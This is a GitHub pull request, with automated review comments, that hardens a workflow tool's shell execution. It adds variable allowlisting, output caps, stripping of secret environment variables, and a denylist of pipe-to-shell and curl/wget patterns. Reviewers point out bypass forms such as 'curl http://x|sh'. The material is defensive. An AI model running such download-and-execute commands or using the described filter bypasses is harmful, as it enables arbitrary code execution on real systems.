security: tool_command sandboxing — 4 defense-in-depth layers#56
security: tool_command sandboxing — 4 defense-in-depth layers#56clintecker merged 5 commits intomainfrom
Conversation
…cesses (#16) Adds buildToolEnv() that filters out env vars matching patterns _API_KEY, _SECRET, _TOKEN, _PASSWORD before executing tool node shell commands. Override with TRACKER_PASS_ENV=1 for trusted environments. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
…ching (#16) Adds tool_safety.go with CheckToolCommand, denylist/allowlist pattern matching, and compound statement splitting. More-specific patterns (curl/wget) ordered before generic pipe-to-shell patterns to ensure correct match attribution. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
#16) - ExpandVariables called with toolCommandMode=true — FAIL CLOSED on unsafe ctx.* keys - CheckToolCommand validates denylist/allowlist on the final command string - parseByteSize helper + per-node output_limit attr parsed and capped at maxOutputLimit - ExecCommandWithLimit + buildToolEnv() used for LocalEnvironment; fallback to ExecCommand for other envs - NewToolHandlerWithConfig constructor for full security configuration - Integration tests: BlocksTaintedVariable, AllowsSafeVariable, DenylistBlocks Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…ols (#16) Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
WalkthroughImplements tool-command safety: restricts LLM-driven Changes
Sequence DiagramsequenceDiagram
participant Client as Tool Node
participant Handler as ToolHandler.Execute
participant Expand as ExpandVariables
participant Validate as CheckToolCommand
participant FilterEnv as buildToolEnv
participant Exec as ExecCommandWithLimit
Client->>Handler: submit tool_command + ctx
Handler->>Expand: ExpandVariables(..., toolCommandMode=true)
alt expansion error (unsafe ctx)
Expand-->>Handler: error (unsafe variable)
Handler-->>Client: fail (unsafe variable)
else expanded
Expand-->>Handler: expanded command
Handler->>Validate: CheckToolCommand(command, nodeID, allowlist, bypassDenylist)
alt validation error
Validate-->>Handler: error (denied/unlisted)
Handler-->>Client: fail (denied/unlisted)
else validated
Validate-->>Handler: ok
Handler->>FilterEnv: buildToolEnv(osEnv)
FilterEnv-->>Handler: filtered env
Handler->>Exec: ExecCommandWithLimit(ctx, cmd, args, timeout, outputLimit, env)
Exec->>Exec: run process, cap stdout/stderr, append truncation marker if needed
Exec-->>Handler: CommandResult (capped output)
Handler-->>Client: success/failure + limited output
end
end
Estimated code review effort🎯 4 (Complex) | ⏱️ ~60 minutes Possibly related PRs
Poem
🚥 Pre-merge checks | ✅ 4 | ❌ 1❌ Failed checks (1 warning)
✅ Passed checks (4 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches📝 Generate docstrings
🧪 Generate unit tests (beta)
Comment |
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: cff04ea9e5
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| if len(p) > remaining { | ||
| p = p[:remaining] | ||
| lb.truncated = true | ||
| } | ||
| return lb.buf.Write(p) |
There was a problem hiding this comment.
Return original byte count from limitedBuffer writes
When len(p) > remaining, limitedBuffer.Write truncates p and returns lb.buf.Write(p), which reports fewer bytes than were requested. os/exec streams use io.Copy, and a short write with nil error is treated as io.ErrShortWrite, so tool commands can fail once output crosses the cap boundary instead of being cleanly truncated. This affects any command that emits enough output for a read chunk to exceed the remaining buffer space.
Useful? React with 👍 / 👎.
| if parsed > h.maxOutputLimit { | ||
| parsed = h.maxOutputLimit | ||
| } | ||
| outputLimit = parsed |
There was a problem hiding this comment.
Enforce positive output_limit before applying node override
The node-level output_limit override is only clamped on the upper bound; non-positive values are accepted and assigned directly. Because ExecCommandWithLimit treats <= 0 as unbounded, a workflow can set output_limit: 0/negative (or an overflowed negative from large MB inputs) to disable truncation entirely, defeating the intended output-cap safety control.
Useful? React with 👍 / 👎.
| "* | sh", | ||
| "* | bash", | ||
| "* | zsh", |
There was a problem hiding this comment.
Broaden pipe-to-shell deny patterns to include shell args
The denylist entries for pipe-to-shell are exact full-statement globs (* | sh, * | bash, etc.), so common variants like cat payload | sh -eux or ... | sh & do not match and pass validation. Since CheckToolCommand anchors matches to the entire statement, these forms bypass the denylist even when it is enabled.
Useful? React with 👍 / 👎.
There was a problem hiding this comment.
Actionable comments posted: 4
🧹 Nitpick comments (4)
CLAUDE.md (1)
202-207: Clarify namespace distinction in safe-key documentation.The current text lists
graph.goalalongside ctx keys, which could imply it's part of the ctx allowlist. It's actually allowed becausegraph.*is a separate namespace that doesn't have LLM-tainted values.Consider rewording for clarity:
-- Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked. ++ Variable expansion in tool_command uses a safe-key allowlist for the `ctx` namespace: only `outcome`, `preferred_label`, `human_response`, `interview_answers` can be interpolated. The `graph.*` and `params.*` namespaces are unrestricted. All LLM-origin ctx keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@CLAUDE.md` around lines 202 - 207, Update the documentation around the tool_command safe-key allowlist to clearly separate ctx keys from the graph namespace: remove or rephrase the implication that graph.goal is part of the same ctx allowlist and instead state that ctx keys allowed for interpolation are outcome, preferred_label, human_response, and interview_answers, while graph.* (e.g., graph.goal) is a distinct namespace whose values are considered safe because they are not LLM-origin; keep the note that LLM-origin keys (last_response, tool_stdout, response.*, etc.) are blocked and ensure any examples and the sentence listing safe keys explicitly indicate the two namespaces (ctx.* vs graph.*) to avoid confusion.agent/exec/local.go (1)
191-208: Consider extracting duplicated error handling into a helper.The error handling logic (lines 197-206) is duplicated between the bounded and unbounded code paths (also at lines 217-225). While this is acceptable for a security-critical path where clarity matters, a small helper could reduce duplication.
♻️ Optional: Extract error handling helper
func handleExecError(err error, ctx context.Context, timeout time.Duration, result CommandResult) (CommandResult, error) { if err != nil { if ctx.Err() != nil { return result, fmt.Errorf("command timed out after %v", timeout) } if exitErr, ok := err.(*exec.ExitError); ok { result.ExitCode = exitErr.ExitCode() return result, nil } return result, err } return result, nil }🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@agent/exec/local.go` around lines 191 - 208, Extract the duplicated error handling in local command execution into a small helper (e.g., handleExecError) that accepts the error returned from cmd.Run(), the current context (ctx), the timeout, and the current CommandResult, and returns (CommandResult, error); move the logic that checks ctx.Err(), inspects *exec.ExitError to set result.ExitCode, and returns the appropriate result/error into that helper, then replace the duplicated blocks in both the unbounded and bounded code paths (the branches using cmd.Run(), stdout/stderr buffers and the CommandResult struct) with calls to handleExecError to avoid repetition.pipeline/handlers/tool_safety.go (1)
49-61: Minor: globMatch compiles regex on every call.For a security-critical path, correctness over performance is the right tradeoff. However, if this becomes a hot path, consider caching compiled patterns.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool_safety.go` around lines 49 - 61, The globMatch function currently recompiles the regex on every call; change it to cache compiled regexes keyed by the lowercased pattern to avoid repeated regexp.Compile calls. Implement a package-level cache (e.g., a sync.Map or a map protected by a sync.RWMutex) and add a helper like getCompiledGlob(pattern string) *regexp.Regexp that lowercases and transforms the pattern (same QuoteMeta + ReplaceAll logic) and returns the cached *regexp.Regexp or compiles, stores, and returns it; then modify globMatch to use getCompiledGlob and handle nil/compile errors by returning false. Ensure the cache key and transformation match the existing behavior (case-insensitive via strings.ToLower).pipeline/handlers/tool.go (1)
54-55: Use suffix matching for the secret env filter.The contract here is
*_API_KEY,*_SECRET,*_TOKEN,*_PASSWORD, butstrings.Containsalso strips names likeAUTH_TOKEN_URLorMY_SECRET_MODE. Narrowing this to suffix matching avoids surprising subprocess breakage while still covering the intended variables.Proposed refactor
- for _, pattern := range sensitiveEnvPatterns { - if strings.Contains(upper, pattern) { + for _, pattern := range sensitiveEnvPatterns { + if strings.HasSuffix(upper, pattern) { sensitive = true break } }🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 54 - 55, The current secret env filter loops over sensitiveEnvPatterns and uses strings.Contains(upper, pattern), which wrongly matches variables like AUTH_TOKEN_URL; change the check to use suffix matching (strings.HasSuffix) so only names ending with the patterns (e.g. *_API_KEY, *_SECRET, *_TOKEN, *_PASSWORD) are filtered; update the loop in the code that references sensitiveEnvPatterns and the variable upper to call strings.HasSuffix(upper, pattern) instead of strings.Contains.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@pipeline/handlers/tool.go`:
- Around line 90-105: The code sets outputLimit from cfg.OutputLimit and
separately computes maxLimit from cfg.MaxOutputLimit but never enforces maxLimit
on outputLimit; update the initialization logic in the ToolHandler construction
(around outputLimit/maxLimit) so you first set outputLimit = cfg.OutputLimit (or
DefaultOutputLimit if <=0), set maxLimit = cfg.MaxOutputLimit (or MaxOutputLimit
if <=0), then clamp outputLimit = min(outputLimit, maxLimit) before returning
the new ToolHandler instance (references: cfg.OutputLimit, cfg.MaxOutputLimit,
DefaultOutputLimit, MaxOutputLimit, outputLimit, maxLimit, ToolHandler).
- Around line 187-196: After parsing node.Attrs["output_limit"] via
parseByteSize in the handler, validate that the parsed value is strictly
positive and return an error if parsed <= 0 (so non-positive values like "0" or
negatives are rejected); then apply the existing cap against h.maxOutputLimit
and set outputLimit. Reference parseByteSize, node.Attrs["output_limit"],
h.maxOutputLimit, outputLimit and ExecCommandWithLimit/limitedWriter to locate
where to add the parsed <= 0 check and error return.
- Around line 46-47: The current check if os.Getenv("TRACKER_PASS_ENV") != ""
allows any non-empty value (e.g., "0" or "false") to bypass env stripping;
change the condition to require the explicit value "1" (e.g.,
os.Getenv("TRACKER_PASS_ENV") == "1") before returning os.Environ() so only
TRACKER_PASS_ENV=1 disables filtering; update the branch that returns
os.Environ() and any related comments to reflect this stricter contract.
- Around line 198-205: The current else branch calls h.env.ExecCommand and thus
skips output capping and filtered env; replace that fallback with a fail-closed
check: define a local interface type that declares ExecCommandWithLimit
(matching exec.LocalEnvironment.ExecCommandWithLimit signature) and attempt a
type assertion on h.env; if it implements the limited call, invoke
ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit,
buildToolEnv()), otherwise return an error from the handler indicating the
environment does not support limited execution (do not call ExecCommand). Update
references: h.env, exec.LocalEnvironment, ExecCommandWithLimit, ExecCommand,
buildToolEnv, outputLimit, timeout.
---
Nitpick comments:
In `@agent/exec/local.go`:
- Around line 191-208: Extract the duplicated error handling in local command
execution into a small helper (e.g., handleExecError) that accepts the error
returned from cmd.Run(), the current context (ctx), the timeout, and the current
CommandResult, and returns (CommandResult, error); move the logic that checks
ctx.Err(), inspects *exec.ExitError to set result.ExitCode, and returns the
appropriate result/error into that helper, then replace the duplicated blocks in
both the unbounded and bounded code paths (the branches using cmd.Run(),
stdout/stderr buffers and the CommandResult struct) with calls to
handleExecError to avoid repetition.
In `@CLAUDE.md`:
- Around line 202-207: Update the documentation around the tool_command safe-key
allowlist to clearly separate ctx keys from the graph namespace: remove or
rephrase the implication that graph.goal is part of the same ctx allowlist and
instead state that ctx keys allowed for interpolation are outcome,
preferred_label, human_response, and interview_answers, while graph.* (e.g.,
graph.goal) is a distinct namespace whose values are considered safe because
they are not LLM-origin; keep the note that LLM-origin keys (last_response,
tool_stdout, response.*, etc.) are blocked and ensure any examples and the
sentence listing safe keys explicitly indicate the two namespaces (ctx.* vs
graph.*) to avoid confusion.
In `@pipeline/handlers/tool_safety.go`:
- Around line 49-61: The globMatch function currently recompiles the regex on
every call; change it to cache compiled regexes keyed by the lowercased pattern
to avoid repeated regexp.Compile calls. Implement a package-level cache (e.g., a
sync.Map or a map protected by a sync.RWMutex) and add a helper like
getCompiledGlob(pattern string) *regexp.Regexp that lowercases and transforms
the pattern (same QuoteMeta + ReplaceAll logic) and returns the cached
*regexp.Regexp or compiles, stores, and returns it; then modify globMatch to use
getCompiledGlob and handle nil/compile errors by returning false. Ensure the
cache key and transformation match the existing behavior (case-insensitive via
strings.ToLower).
In `@pipeline/handlers/tool.go`:
- Around line 54-55: The current secret env filter loops over
sensitiveEnvPatterns and uses strings.Contains(upper, pattern), which wrongly
matches variables like AUTH_TOKEN_URL; change the check to use suffix matching
(strings.HasSuffix) so only names ending with the patterns (e.g. *_API_KEY,
*_SECRET, *_TOKEN, *_PASSWORD) are filtered; update the loop in the code that
references sensitiveEnvPatterns and the variable upper to call
strings.HasSuffix(upper, pattern) instead of strings.Contains.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Pro
Run ID: 62246804-0d06-4064-ae68-175a0d56b2e5
📒 Files selected for processing (9)
CLAUDE.mdagent/exec/env_test.goagent/exec/local.gopipeline/expand.gopipeline/expand_test.gopipeline/handlers/tool.gopipeline/handlers/tool_safety.gopipeline/handlers/tool_safety_test.gopipeline/handlers/tool_test.go
| if limitStr, ok := node.Attrs["output_limit"]; ok && limitStr != "" { | ||
| parsed, err := parseByteSize(limitStr) | ||
| if err != nil { | ||
| return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: %w", node.ID, limitStr, err) | ||
| } | ||
| if parsed > h.maxOutputLimit { | ||
| parsed = h.maxOutputLimit | ||
| } | ||
| outputLimit = parsed | ||
| } |
There was a problem hiding this comment.
Reject non-positive output_limit values.
parseByteSize("0") and negative inputs currently flow into ExecCommandWithLimit unchanged. That makes the cap depend on limitedWriter edge-case behavior instead of enforcing a positive bound here.
Proposed fix
if limitStr, ok := node.Attrs["output_limit"]; ok && limitStr != "" {
parsed, err := parseByteSize(limitStr)
if err != nil {
return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: %w", node.ID, limitStr, err)
}
+ if parsed <= 0 {
+ return pipeline.Outcome{}, fmt.Errorf("node %q has invalid output_limit %q: must be > 0", node.ID, limitStr)
+ }
if parsed > h.maxOutputLimit {
parsed = h.maxOutputLimit
}
outputLimit = parsed
}🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@pipeline/handlers/tool.go` around lines 187 - 196, After parsing
node.Attrs["output_limit"] via parseByteSize in the handler, validate that the
parsed value is strictly positive and return an error if parsed <= 0 (so
non-positive values like "0" or negatives are rejected); then apply the existing
cap against h.maxOutputLimit and set outputLimit. Reference parseByteSize,
node.Attrs["output_limit"], h.maxOutputLimit, outputLimit and
ExecCommandWithLimit/limitedWriter to locate where to add the parsed <= 0 check
and error return.
| // Layer 4: Use ExecCommandWithLimit with buildToolEnv() when running on LocalEnvironment. | ||
| // For other ExecutionEnvironment implementations (e.g. mock, remote), fall back to ExecCommand. | ||
| var result exec.CommandResult | ||
| if le, ok := h.env.(*exec.LocalEnvironment); ok { | ||
| result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv()) | ||
| } else { | ||
| result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout) | ||
| } |
There was a problem hiding this comment.
Don’t silently drop the new safeguards on non-local environments.
Per agent/exec/env.go:17-25, ExecutionEnvironment does not expose a limited-exec API, so this else branch skips both output capping and filtered-env execution. agent/exec/local.go:93-137 is currently the only implementation that enforces those protections, which means SSH/container/mock environments fall back to the old behavior here.
Minimal fail-closed alternative
if le, ok := h.env.(*exec.LocalEnvironment); ok {
result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv())
} else {
- result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout)
+ return pipeline.Outcome{}, fmt.Errorf(
+ "node %q execution environment %T does not support limited tool_command execution",
+ node.ID, h.env,
+ )
}🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@pipeline/handlers/tool.go` around lines 198 - 205, The current else branch
calls h.env.ExecCommand and thus skips output capping and filtered env; replace
that fallback with a fail-closed check: define a local interface type that
declares ExecCommandWithLimit (matching
exec.LocalEnvironment.ExecCommandWithLimit signature) and attempt a type
assertion on h.env; if it implements the limited call, invoke
ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit,
buildToolEnv()), otherwise return an error from the handler indicating the
environment does not support limited execution (do not call ExecCommand). Update
references: h.env, exec.LocalEnvironment, ExecCommandWithLimit, ExecCommand,
buildToolEnv, outputLimit, timeout.
There was a problem hiding this comment.
Pull request overview
Implements defense-in-depth hardening for tool_command execution in the pipeline tool handler to reduce shell injection risk and limit damage/exfiltration from malicious .dip graphs or LLM-derived content.
Changes:
- Adds a fail-closed allowlist for
${ctx.*}interpolation when expandingtool_command. - Introduces per-stream stdout/stderr output caps (default 64KB; configurable with a hard ceiling) via a new
ExecCommandWithLimit. - Adds command denylist + optional allowlist validation and strips sensitive env vars for local tool subprocesses.
Reviewed changes
Copilot reviewed 9 out of 9 changed files in this pull request and generated 8 comments.
Show a summary per file
| File | Description |
|---|---|
pipeline/handlers/tool.go |
Wires variable-expansion allowlist, command safety checks, output limiting, and env stripping into tool execution. |
pipeline/handlers/tool_test.go |
Adds tests for env stripping and tool handler security behavior (tainted ctx keys, denylist). |
pipeline/handlers/tool_safety.go |
Implements denylist/allowlist matching for tool commands (per-statement). |
pipeline/handlers/tool_safety_test.go |
Unit tests for statement splitting + denylist/allowlist behavior. |
pipeline/expand.go |
Adds toolCommandMode to restrict ${ctx.*} expansion to a safe allowlist. |
pipeline/expand_test.go |
Adds tests confirming tool-command mode blocks unsafe ctx keys and allows safe ones. |
CLAUDE.md |
Documents the new tool safety controls and recommended usage patterns. |
agent/exec/local.go |
Adds ExecCommandWithLimit and a thread-safe limited buffer to cap output capture. |
agent/exec/env_test.go |
Adds tests validating truncation behavior and custom env support for ExecCommandWithLimit. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| if strings.HasSuffix(upper, "MB") { | ||
| n, err := strconv.Atoi(strings.TrimSuffix(upper, "MB")) | ||
| return n * 1024 * 1024, err | ||
| } | ||
| if strings.HasSuffix(upper, "KB") { | ||
| n, err := strconv.Atoi(strings.TrimSuffix(upper, "KB")) | ||
| return n * 1024, err | ||
| } | ||
| return strconv.Atoi(s) |
There was a problem hiding this comment.
parseByteSize + output_limit handling allows negative values (e.g. "-1", "-1MB"), which later makes outputLimit <= 0 and disables output limiting in ExecCommandWithLimit. This undermines the output-cap security layer; treat non-positive parsed limits as invalid and return an error (or clamp to a minimum of 1). Also consider using int64 and validating before multiplying to avoid overflow on 32-bit platforms.
| if strings.HasSuffix(upper, "MB") { | |
| n, err := strconv.Atoi(strings.TrimSuffix(upper, "MB")) | |
| return n * 1024 * 1024, err | |
| } | |
| if strings.HasSuffix(upper, "KB") { | |
| n, err := strconv.Atoi(strings.TrimSuffix(upper, "KB")) | |
| return n * 1024, err | |
| } | |
| return strconv.Atoi(s) | |
| maxInt := int64(^uint(0) >> 1) | |
| parseWithMultiplier := func(raw string, multiplier int64) (int, error) { | |
| n, err := strconv.ParseInt(strings.TrimSpace(raw), 10, 64) | |
| if err != nil { | |
| return 0, err | |
| } | |
| if n <= 0 { | |
| return 0, fmt.Errorf("byte size must be greater than zero") | |
| } | |
| if n > maxInt/multiplier { | |
| return 0, fmt.Errorf("byte size %q overflows", s) | |
| } | |
| total := n * multiplier | |
| if total > maxInt { | |
| return 0, fmt.Errorf("byte size %q overflows", s) | |
| } | |
| return int(total), nil | |
| } | |
| if strings.HasSuffix(upper, "MB") { | |
| return parseWithMultiplier(strings.TrimSuffix(upper, "MB"), 1024*1024) | |
| } | |
| if strings.HasSuffix(upper, "KB") { | |
| return parseWithMultiplier(strings.TrimSuffix(upper, "KB"), 1024) | |
| } | |
| return parseWithMultiplier(s, 1) |
| // NewToolHandlerWithConfig creates a ToolHandler with full security configuration. | ||
| func NewToolHandlerWithConfig(env exec.ExecutionEnvironment, cfg ToolHandlerConfig) *ToolHandler { | ||
| outputLimit := cfg.OutputLimit | ||
| if outputLimit <= 0 { | ||
| outputLimit = DefaultOutputLimit | ||
| } | ||
| maxLimit := cfg.MaxOutputLimit | ||
| if maxLimit <= 0 { | ||
| maxLimit = MaxOutputLimit | ||
| } | ||
| return &ToolHandler{ | ||
| env: env, | ||
| defaultTimeout: defaultToolTimeout, | ||
| outputLimit: outputLimit, | ||
| maxOutputLimit: maxLimit, | ||
| allowlist: cfg.Allowlist, | ||
| bypassDenylist: cfg.BypassDenylist, | ||
| } |
There was a problem hiding this comment.
NewToolHandlerWithConfig does not enforce OutputLimit <= MaxOutputLimit. If cfg.OutputLimit is set higher than cfg.MaxOutputLimit, the default per-node limit (when output_limit attr is omitted) can exceed the intended hard ceiling. Consider clamping outputLimit to maxLimit (or returning an error) when building the handler config.
pipeline/handlers/tool.go
Outdated
| @@ -72,6 +168,11 @@ func (h *ToolHandler) Execute(ctx context.Context, node *pipeline.Node, pctx *pi | |||
| command = fmt.Sprintf("cd %q && %s", cleaned, command) | |||
| } | |||
|
|
|||
| // Layer 2: Denylist/allowlist check on the FINAL command string (after working_dir prepend). | |||
| if err := CheckToolCommand(command, node.ID, h.allowlist, h.bypassDenylist); err != nil { | |||
| return pipeline.Outcome{}, err | |||
| } | |||
There was a problem hiding this comment.
CheckToolCommand is run after prepending the working_dir wrapper ("cd ... &&"). Because allowlist matching is per-statement, enabling an allowlist will now require patterns for the injected "cd" statement as well, which is surprising and can break previously-allowed commands. Consider validating allowlist/denylist against the user-authored command before adding the working_dir prefix (or explicitly exempt/allow the injected "cd" statement).
| // defaultDenyPatterns are blocked in all tool_command executions. | ||
| // Cannot be overridden by .dip graph attrs. Only --bypass-denylist CLI flag disables them. | ||
| // Patterns use * as wildcard. Matching is case-insensitive, per-statement. | ||
| var defaultDenyPatterns = []string{ | ||
| "eval *", | ||
| "exec *", | ||
| "source *", | ||
| ". /*", | ||
| "curl * | *", | ||
| "wget * | *", | ||
| "* | sh", | ||
| "* | bash", | ||
| "* | zsh", | ||
| "* | /bin/sh", | ||
| "* | /bin/bash", | ||
| "* | sh -", | ||
| "* | bash -", | ||
| } |
There was a problem hiding this comment.
The denylist patterns are brittle to whitespace variations and can be bypassed (e.g. "curl http://x|sh" won’t match "curl * | " / " | sh" due to missing spaces; "eval\tfoo" won’t match "eval "; and the current ". /" pattern blocks only absolute paths, not the common ". ./script.sh" form). Since this is a security layer, consider switching to token/regex-based matching that tolerates arbitrary whitespace (and explicitly covers ". *" / ". ./"), rather than simple space-sensitive globs.
CLAUDE.md
Outdated
|
|
||
| ### Tool node safety — LLM output as shell input | ||
| - NEVER `eval` content extracted from LLM-written files (arbitrary command execution) | ||
| - Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked. |
There was a problem hiding this comment.
This doc line claims tool_command interpolation allows only specific ctx keys plus "graph.goal", but the implementation only restricts ctx.* and allows any ${graph.*} key in toolCommandMode. Either update the doc to reflect that all graph attrs are allowed, or tighten the implementation to match the documented contract.
| - Variable expansion in tool_command uses a safe-key allowlist: only `outcome`, `preferred_label`, `human_response`, `interview_answers`, and `graph.goal` can be interpolated. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked. | |
| - Variable expansion in `tool_command` uses a safe-key allowlist for context values: only `outcome`, `preferred_label`, `human_response`, and `interview_answers` may be interpolated from `ctx.*`. Graph attribute interpolation is allowed via `${graph.*}` (including, but not limited to, `${graph.goal}`). LLM-origin context keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked. |
| func TestToolHandler_BlocksTaintedVariable(t *testing.T) { | ||
| env := exec.NewLocalEnvironment(t.TempDir()) | ||
| h := NewToolHandler(env) | ||
| node := &pipeline.Node{ |
There was a problem hiding this comment.
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. Elsewhere in this file toolTestEnv() is used to keep tests passing in sandboxed environments without sh; consider switching to toolTestEnv() (or skipping when sh is unavailable) for consistency and CI portability.
| func TestToolHandler_AllowsSafeVariable(t *testing.T) { | ||
| env := exec.NewLocalEnvironment(t.TempDir()) | ||
| h := NewToolHandler(env) | ||
| node := &pipeline.Node{ |
There was a problem hiding this comment.
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. For portability (matching the rest of this file), consider using toolTestEnv() or skipping when sh is unavailable.
| func TestToolHandler_DenylistBlocks(t *testing.T) { | ||
| env := exec.NewLocalEnvironment(t.TempDir()) | ||
| h := NewToolHandler(env) | ||
| node := &pipeline.Node{ |
There was a problem hiding this comment.
This test uses exec.NewLocalEnvironment directly, which requires a real "sh" in PATH. For portability (matching the rest of this file), consider using toolTestEnv() or skipping when sh is unavailable.
…imit, denylist, env, tests - limitedBuffer.Write returns len(p) on truncation (not short write) - TRACKER_PASS_ENV checks for "1" not just non-empty - OutputLimit clamped to MaxOutputLimit in constructor - Non-positive output_limit node attr rejected with error - Denylist check moved before working_dir prepend (allowlist doesn't need cd patterns) - Broadened denylist: `. ./*`, `* | sh *`, `* | bash *`, etc. - CLAUDE.md: documents all graph.*/params.* allowed, not just graph.goal - Tests use toolTestEnv() for CI portability Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
There was a problem hiding this comment.
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
pipeline/handlers/tool.go (1)
169-177:⚠️ Potential issue | 🟠 MajorConstrain
working_dirto the execution root.
filepath.Cleanplus a raw..substring check is not enough here. Absolute paths,working_dir="-", and symlinked directories all survive this guard, and Line 177 then prepends a shellcdthat changes where an otherwise-validated command runs. Resolve the directory against the intended execution root, reject escapes after symlink resolution, and usecd --for the final hop.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 169 - 177, The working_dir validation in the tool handler is insufficient: instead of only filepath.Clean + substring checks, resolve the provided working_dir (node.Attrs["working_dir"]) against the execution root, reject absolute paths or paths that escape the execution root after evaluating symlinks (use filepath.Join(execRoot, wd) then filepath.EvalSymlinks and ensure the result has execRoot as its prefix), treat weird names like "-" as invalid, and if accepted build the shell change directory with a safe form using "cd -- <cleanedRelPath> && <command>" (update the code that produces command and the error returns of pipeline.Outcome{} to use these stronger checks and explicit rejection messages).
♻️ Duplicate comments (1)
pipeline/handlers/tool.go (1)
205-212:⚠️ Potential issue | 🟠 MajorFail closed when limited execution is unavailable.
Line 211 still falls back to
ExecCommand, which drops both the capped buffers andbuildToolEnv()filtering for every non-local environment. That makes the new safety guarantees environment-dependent again. Prefer asserting on a smallExecCommandWithLimitinterface and returning an error when the environment cannot provide it.Possible fix
+type limitedExecEnvironment interface { + ExecCommandWithLimit(context.Context, string, []string, time.Duration, int, ...[]string) (exec.CommandResult, error) +} + var result exec.CommandResult -if le, ok := h.env.(*exec.LocalEnvironment); ok { +if le, ok := h.env.(limitedExecEnvironment); ok { result, err = le.ExecCommandWithLimit(ctx, "sh", []string{"-c", command}, timeout, outputLimit, buildToolEnv()) } else { - result, err = h.env.ExecCommand(ctx, "sh", []string{"-c", command}, timeout) + return pipeline.Outcome{}, fmt.Errorf( + "node %q execution environment %T does not support limited tool_command execution", + node.ID, h.env, + ) }🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@pipeline/handlers/tool.go` around lines 205 - 212, The current branch falls back to h.env.ExecCommand, losing outputLimit and buildToolEnv protections; instead define and assert a small interface (e.g., type limitedExecutor interface { ExecCommandWithLimit(context.Context, string, []string, time.Duration, int, map[string]string) (exec.CommandResult, error) }) and check h.env against it (similar to the LocalEnvironment check); if the assertion fails return an error explaining that limited execution is required, otherwise call ExecCommandWithLimit with timeout, outputLimit and buildToolEnv(); update references to exec.CommandResult, buildToolEnv, LocalEnvironment and h.env in the implementation accordingly.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Outside diff comments:
In `@pipeline/handlers/tool.go`:
- Around line 169-177: The working_dir validation in the tool handler is
insufficient: instead of only filepath.Clean + substring checks, resolve the
provided working_dir (node.Attrs["working_dir"]) against the execution root,
reject absolute paths or paths that escape the execution root after evaluating
symlinks (use filepath.Join(execRoot, wd) then filepath.EvalSymlinks and ensure
the result has execRoot as its prefix), treat weird names like "-" as invalid,
and if accepted build the shell change directory with a safe form using "cd --
<cleanedRelPath> && <command>" (update the code that produces command and the
error returns of pipeline.Outcome{} to use these stronger checks and explicit
rejection messages).
---
Duplicate comments:
In `@pipeline/handlers/tool.go`:
- Around line 205-212: The current branch falls back to h.env.ExecCommand,
losing outputLimit and buildToolEnv protections; instead define and assert a
small interface (e.g., type limitedExecutor interface {
ExecCommandWithLimit(context.Context, string, []string, time.Duration, int,
map[string]string) (exec.CommandResult, error) }) and check h.env against it
(similar to the LocalEnvironment check); if the assertion fails return an error
explaining that limited execution is required, otherwise call
ExecCommandWithLimit with timeout, outputLimit and buildToolEnv(); update
references to exec.CommandResult, buildToolEnv, LocalEnvironment and h.env in
the implementation accordingly.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Pro
Run ID: e268aeb0-db4e-43c6-af34-73ed3f30352b
📒 Files selected for processing (5)
CLAUDE.mdagent/exec/local.gopipeline/handlers/tool.gopipeline/handlers/tool_safety.gopipeline/handlers/tool_test.go
✅ Files skipped from review due to trivial changes (1)
- pipeline/handlers/tool_test.go
